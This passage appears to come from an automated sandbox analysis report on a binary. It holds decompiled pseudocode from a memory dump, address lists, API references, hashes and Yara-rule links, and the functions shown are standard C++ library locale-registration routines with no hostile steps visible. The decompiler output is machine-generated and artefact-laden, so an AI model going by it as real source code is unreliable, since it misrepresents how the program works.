							 *((intOrPtr*)( *((intOrPtr*)( *_t272 + 4))))();
							 *0x6e2216e8 = _t272;
							goto L5;
						}
					} else {
						_t272 = _t280;
						goto L5;
					}
				}
			}

0x6e199533
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199564
0x6e199569
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571

APIs

__EH_prolog3.LIBCMT ref: 6E19953A
std::_Lockit::_Lockit.LIBCPMT ref: 6E199544

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199595
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1995B5
Concurrency::cancel_current_task.LIBCPMT ref: 6E1995C2

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 6c47e9028ae1c1244a2df7f967daf6b40876b43498ff11e2b6a83b813fa47b18
Instruction ID: 84dfd3b6f4dfdbcf1ccb9d8ddfb0604cea7001353bbad243d6fce4a185ca67e2
Opcode Fuzzy Hash: 6c47e9028ae1c1244a2df7f967daf6b40876b43498ff11e2b6a83b813fa47b18
Instruction Fuzzy Hash: 6401C475A001199FCB05DBE4D824AFE7779AF84314F244909E812AB280CF30DEC8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E193586, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E193586(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				signed int _t34;
				void* _t50;
				char* _t74;
				signed int _t83;
				signed int _t85;
				signed int _t86;
				char* _t87;

				_t62 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5( &_v20, 0);
				_t85 =  *0x6e2215f0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t85;
				_t34 = E6E162171(_a8, E6E161F29(__ebx, 0x6e2215e4, __edi, _t85));
				_t82 = _t34;
				if(_t34 != 0) {
					L5:
					E6E18F30C( &_v20);
					return E6E1A9D88(_t82);
				} else {
					if(_t85 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E193C92(__ebx, _t82, _t85) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t62, _t82, _t85, 8);
							E6E18F2A5( &_v20, 0);
							_t86 =  *0x6e2215f4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t86;
							_t83 = E6E162171(_a8, E6E161F29(_t62, 0x6e2215e8, _t82, _t86));
							__eflags = _t83;
							if(_t83 != 0) {
								L12:
								E6E18F30C( &_v20);
								return E6E1A9D88(_t83);
							} else {
								__eflags = _t86;
								if(_t86 == 0) {
									_push(_a8);
									_push( &_v16);
									_t50 = E6E193CFA(_t62, _t83, _t86);
									_pop(_t74);
									__eflags = _t50 - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										_push(_t86);
										_t87 = _t74;
										_t27 = _t87 + 0x10;
										 *_t27 =  *(_t87 + 0x10) & 0x00000000;
										__eflags =  *_t27;
										 *((intOrPtr*)(_t87 + 0x14)) = 0xf;
										 *_t87 = 0;
										E6E1958BE(_t74, _a4, _a8);
										return _t87;
									} else {
										_t83 = _v16;
										_v16 = _t83;
										_v4 = 1;
										E6E1911C1(__eflags, _t83);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 4))))();
										 *0x6e2215f4 = _t83;
										goto L12;
									}
								} else {
									_t83 = _t86;
									goto L12;
								}
							}
						} else {
							_t82 = _v16;
							_v16 = _t82;
							_v4 = 1;
							E6E1911C1(__eflags, _t82);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 4))))();
							 *0x6e2215f0 = _t82;
							goto L5;
						}
					} else {
						_t82 = _t85;
						goto L5;
					}
				}
			}

0x6e193586
0x6e19358d
0x6e193597
0x6e19359c
0x6e1935a7
0x6e1935ab
0x6e1935b7
0x6e1935bc
0x6e1935c0
0x6e193605
0x6e193608
0x6e193614
0x6e1935c2
0x6e1935c4
0x6e1935ca
0x6e1935d0
0x6e1935d8
0x6e1935db
0x6e193615
0x6e19361a
0x6e193622
0x6e19362c
0x6e193631
0x6e19363c
0x6e193640
0x6e193651
0x6e193653
0x6e193655
0x6e19369a
0x6e19369d
0x6e1936a9
0x6e193657
0x6e193657
0x6e193659
0x6e19365f
0x6e193665
0x6e193666
0x6e19366c
0x6e19366d
0x6e193670
0x6e1936aa
0x6e1936af
0x6e1936b3
0x6e1936b7
0x6e1936bc
0x6e1936bc
0x6e1936bc
0x6e1936c0
0x6e1936c7
0x6e1936ca
0x6e1936d3
0x6e193672
0x6e193672
0x6e193675
0x6e193679
0x6e19367d
0x6e19368a
0x6e193692
0x6e193694
0x00000000
0x6e193694
0x6e19365b
0x6e19365b
0x00000000
0x6e19365b
0x6e193659
0x6e1935dd
0x6e1935dd
0x6e1935e0
0x6e1935e4
0x6e1935e8
0x6e1935f5
0x6e1935fd
0x6e1935ff
0x00000000
0x6e1935ff
0x6e1935c6
0x6e1935c6
0x00000000
0x6e1935c6
0x6e1935c4

APIs

__EH_prolog3.LIBCMT ref: 6E19358D
std::_Lockit::_Lockit.LIBCPMT ref: 6E193597

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E1935E8
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193608
Concurrency::cancel_current_task.LIBCPMT ref: 6E193615

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: bca1340ba5b6978a579c7b5907cf40da11f9892440004dd421f794833fc6f063
Instruction ID: 5dc0ecf0093aa5c2fd7aaa294e1ccc9ff0ecd5257c13098035591ba67b102a6f
Opcode Fuzzy Hash: bca1340ba5b6978a579c7b5907cf40da11f9892440004dd421f794833fc6f063
Instruction Fuzzy Hash: 9501C8359005159BCB05DBE4C8146FD777ABF84314F254949D525AB280DF309AC5F751

Uniqueness

Uniqueness Score: -1.00%

Function 6E1995C8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1995C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t86;
				void* _t146;
				signed int _t215;
				void* _t234;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				void* _t256;

				_t179 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t256 - 0x14, 0);
				_t243 =  *0x6e221714; // 0x0
				 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
				 *(_t256 - 0x10) = _t243;
				_t86 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(__ebx, 0x6e2216c0, __edi, _t243));
				_t236 = _t86;
				if(_t86 != 0) {
					L5:
					E6E18F30C(_t256 - 0x14);
					return E6E1A9D88(_t236);
				} else {
					if(_t243 == 0) {
						_push( *((intOrPtr*)(_t256 + 8)));
						_push(_t256 - 0x10);
						__eflags = E6E19B055(__ebx, _t236, _t243) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t179, _t236, _t243, 8);
							E6E18F2A5(_t256 - 0x14, 0);
							_t244 =  *0x6e221718; // 0x0
							 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
							 *(_t256 - 0x10) = _t244;
							_t237 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e2216c4, _t236, _t244));
							__eflags = _t237;
							if(_t237 != 0) {
								L12:
								E6E18F30C(_t256 - 0x14);
								return E6E1A9D88(_t237);
							} else {
								__eflags = _t244;
								if(_t244 == 0) {
									_push( *((intOrPtr*)(_t256 + 8)));
									_push(_t256 - 0x10);
									__eflags = E6E19B0BD(_t179, _t237, _t244) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t179, _t237, _t244, 8);
										E6E18F2A5(_t256 - 0x14, 0);
										_t245 =  *0x6e221734; // 0x0
										 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
										 *(_t256 - 0x10) = _t245;
										_t238 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e2216e0, _t237, _t245));
										__eflags = _t238;
										if(_t238 != 0) {
											L19:
											E6E18F30C(_t256 - 0x14);
											return E6E1A9D88(_t238);
										} else {
											__eflags = _t245;
											if(_t245 == 0) {
												_push( *((intOrPtr*)(_t256 + 8)));
												_push(_t256 - 0x10);
												__eflags = E6E19B138(_t179, _t238, _t245) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t179, _t238, _t245, 8);
													E6E18F2A5(_t256 - 0x14, 0);
													_t246 =  *0x6e221704; // 0x0
													 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
													 *(_t256 - 0x10) = _t246;
													_t239 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e2216b8, _t238, _t246));
													__eflags = _t239;
													if(_t239 != 0) {
														L26:
														E6E18F30C(_t256 - 0x14);
														return E6E1A9D88(_t239);
													} else {
														__eflags = _t246;
														if(_t246 == 0) {
															_push( *((intOrPtr*)(_t256 + 8)));
															_push(_t256 - 0x10);
															__eflags = E6E19B1A4(_t179, _t239, _t246) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t179, _t239, _t246, 8);
																E6E18F2A5(_t256 - 0x14, 0);
																_t247 =  *0x6e221738; // 0x0
																 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
																 *(_t256 - 0x10) = _t247;
																_t240 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e2216e4, _t239, _t247));
																__eflags = _t240;
																if(_t240 != 0) {
																	L33:
																	E6E18F30C(_t256 - 0x14);
																	return E6E1A9D88(_t240);
																} else {
																	__eflags = _t247;
																	if(_t247 == 0) {
																		_push( *((intOrPtr*)(_t256 + 8)));
																		_push(_t256 - 0x10);
																		__eflags = E6E19B210(_t179, _t240, _t247) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t179, _t240, _t247, 8);
																			E6E18F2A5(_t256 - 0x14, 0);
																			_t248 =  *0x6e221708; // 0x0
																			 *(_t256 - 4) =  *(_t256 - 4) & 0x00000000;
																			 *(_t256 - 0x10) = _t248;
																			_t241 = E6E162171( *((intOrPtr*)(_t256 + 8)), E6E161F29(_t179, 0x6e221698, _t240, _t248));
																			__eflags = _t241;
																			if(_t241 != 0) {
																				L40:
																				E6E18F30C(_t256 - 0x14);
																				return E6E1A9D88(_t241);
																			} else {
																				__eflags = _t248;
																				if(_t248 == 0) {
																					_push( *((intOrPtr*)(_t256 + 8)));
																					_push(_t256 - 0x10);
																					_t146 = E6E19B284(_t179, _t241, _t248);
																					_pop(_t215);
																					__eflags = _t146 - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ecb1a, _t179, _t241, _t248, 4);
																						_t249 = _t215;
																						 *(_t256 - 0x10) = _t249;
																						 *((intOrPtr*)(_t249 + 4)) =  *((intOrPtr*)(_t256 + 0xc));
																						_push( *((intOrPtr*)(_t256 + 0x14)));
																						_t79 = _t256 - 4;
																						 *_t79 =  *(_t256 - 4) & 0x00000000;
																						__eflags =  *_t79;
																						 *_t249 = 0x6e1f225c;
																						 *((char*)(_t249 + 0x28)) =  *((intOrPtr*)(_t256 + 0x10));
																						E6E19F3D8(_t179, _t215, _t234, _t241, _t249,  *_t79);
																						return E6E1A9D88(_t249,  *((intOrPtr*)(_t256 + 8)));
																					} else {
																						_t241 =  *(_t256 - 0x10);
																						 *(_t256 - 0x10) = _t241;
																						 *(_t256 - 4) = 1;
																						E6E1911C1(__eflags, _t241);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t241 + 4))))();
																						 *0x6e221708 = _t241;
																						goto L40;
																					}
																				} else {
																					_t241 = _t248;
																					goto L40;
																				}
																			}
																		} else {
																			_t240 =  *(_t256 - 0x10);
																			 *(_t256 - 0x10) = _t240;
																			 *(_t256 - 4) = 1;
																			E6E1911C1(__eflags, _t240);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t240 + 4))))();
																			 *0x6e221738 = _t240;
																			goto L33;
																		}
																	} else {
																		_t240 = _t247;
																		goto L33;
																	}
																}
															} else {
																_t239 =  *(_t256 - 0x10);
																 *(_t256 - 0x10) = _t239;
																 *(_t256 - 4) = 1;
																E6E1911C1(__eflags, _t239);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t239 + 4))))();
																 *0x6e221704 = _t239;
																goto L26;
															}
														} else {
															_t239 = _t246;
															goto L26;
														}
													}
												} else {
													_t238 =  *(_t256 - 0x10);
													 *(_t256 - 0x10) = _t238;
													 *(_t256 - 4) = 1;
													E6E1911C1(__eflags, _t238);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t238 + 4))))();
													 *0x6e221734 = _t238;
													goto L19;
												}
											} else {
												_t238 = _t245;
												goto L19;
											}
										}
									} else {
										_t237 =  *(_t256 - 0x10);
										 *(_t256 - 0x10) = _t237;
										 *(_t256 - 4) = 1;
										E6E1911C1(__eflags, _t237);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t237 + 4))))();
										 *0x6e221718 = _t237;
										goto L12;
									}
								} else {
									_t237 = _t244;
									goto L12;
								}
							}
						} else {
							_t236 =  *(_t256 - 0x10);
							 *(_t256 - 0x10) = _t236;
							 *(_t256 - 4) = 1;
							E6E1911C1(__eflags, _t236);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t236 + 4))))();
							 *0x6e221714 = _t236;
							goto L5;
						}
					} else {
						_t236 = _t243;
						goto L5;
					}
				}
			}

0x6e1995c8
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995f9
0x6e1995fe
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606

APIs

__EH_prolog3.LIBCMT ref: 6E1995CF
std::_Lockit::_Lockit.LIBCPMT ref: 6E1995D9

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E19962A
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19964A
Concurrency::cancel_current_task.LIBCPMT ref: 6E199657

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: b55e0cb03f19d12d60bb1de78994e5a5f22c2dc86b64874f37de05a11e76bd12
Instruction ID: fd1e8ffaef74a995377b76ec1c2cf678ee96b9ef2237b59f72e05b6be5e3bb92
Opcode Fuzzy Hash: b55e0cb03f19d12d60bb1de78994e5a5f22c2dc86b64874f37de05a11e76bd12
Instruction Fuzzy Hash: 6701C035A001198FCF05DBE4C864AFE77BEAF84314F240809E825AB290CF319AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19908B, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E19908B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t194;
				void* _t353;
				signed int _t512;
				void* _t558;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t591;
				void* _t607;

				_t422 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t607 - 0x14, 0);
				_t576 =  *0x6e2216f4; // 0x0
				 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
				 *(_t607 - 0x10) = _t576;
				_t194 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(__ebx, 0x6e2216a8, __edi, _t576));
				_t560 = _t194;
				if(_t194 != 0) {
					L5:
					E6E18F30C(_t607 - 0x14);
					return E6E1A9D88(_t560);
				} else {
					if(_t576 == 0) {
						_push( *((intOrPtr*)(_t607 + 8)));
						_push(_t607 - 0x10);
						__eflags = E6E19AC3B(__ebx, _t560, _t576) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t422, _t560, _t576, 8);
							E6E18F2A5(_t607 - 0x14, 0);
							_t577 =  *0x6e221728; // 0x0
							 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
							 *(_t607 - 0x10) = _t577;
							_t561 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216d4, _t560, _t577));
							__eflags = _t561;
							if(_t561 != 0) {
								L12:
								E6E18F30C(_t607 - 0x14);
								return E6E1A9D88(_t561);
							} else {
								__eflags = _t577;
								if(_t577 == 0) {
									_push( *((intOrPtr*)(_t607 + 8)));
									_push(_t607 - 0x10);
									__eflags = E6E19ACA3(_t422, _t561, _t577) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t422, _t561, _t577, 8);
										E6E18F2A5(_t607 - 0x14, 0);
										_t578 =  *0x6e2216f8; // 0x0
										 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
										 *(_t607 - 0x10) = _t578;
										_t562 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216ac, _t561, _t578));
										__eflags = _t562;
										if(_t562 != 0) {
											L19:
											E6E18F30C(_t607 - 0x14);
											return E6E1A9D88(_t562);
										} else {
											__eflags = _t578;
											if(_t578 == 0) {
												_push( *((intOrPtr*)(_t607 + 8)));
												_push(_t607 - 0x10);
												__eflags = E6E19AD0B(_t422, _t562, _t578) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t422, _t562, _t578, 8);
													E6E18F2A5(_t607 - 0x14, 0);
													_t579 =  *0x6e221730; // 0x0
													 *(_t607 - 4) =  *(_t607 - 4) & 0x00000000;
													 *(_t607 - 0x10) = _t579;
													_t563 = E6E162171( *((intOrPtr*)(_t607 + 8)), E6E161F29(_t422, 0x6e2216dc, _t562, _t579));
													__eflags = _t563;
													if(_t563 != 0) {
														L26:
														E6E18F30C(_t607 - 0x14);
														return E6E1A9D88(_t563);
													} else {
														__eflags = _t579;
														if(_t579 == 0) {
															_push( *((intOrPtr*)(_t607 + 8)));
															_push(_t607 - 0x10);
															__eflags = E6E19AD73(_t422, _t563, _t579) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
